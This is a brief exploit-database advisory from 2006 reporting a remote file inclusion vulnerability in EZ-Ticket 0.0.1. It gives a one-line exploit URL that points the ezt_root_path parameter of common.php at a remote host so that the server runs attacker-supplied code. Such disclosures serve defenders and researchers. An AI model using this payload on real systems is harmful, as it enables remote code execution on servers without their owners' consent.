id: 1045
date: 10/21/2006
title: EZ-Ticket 0.0.1 (common.php) Remote File Include Vulnerability
author: the master
cves: 

==============================================================
EZ-Ticket 0.0.1 (common.php) Remote File Include Vulnerability
==============================================================



########################################################################
#  EZ-Ticket v0.0.1  Remote File Inclusion Vulnerability
#
#  Found By: the master (nidhal)
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/common.php?ezt_root_path=http://cmd.gif?
########################################################################



#  0day.today [2023-03-23]  #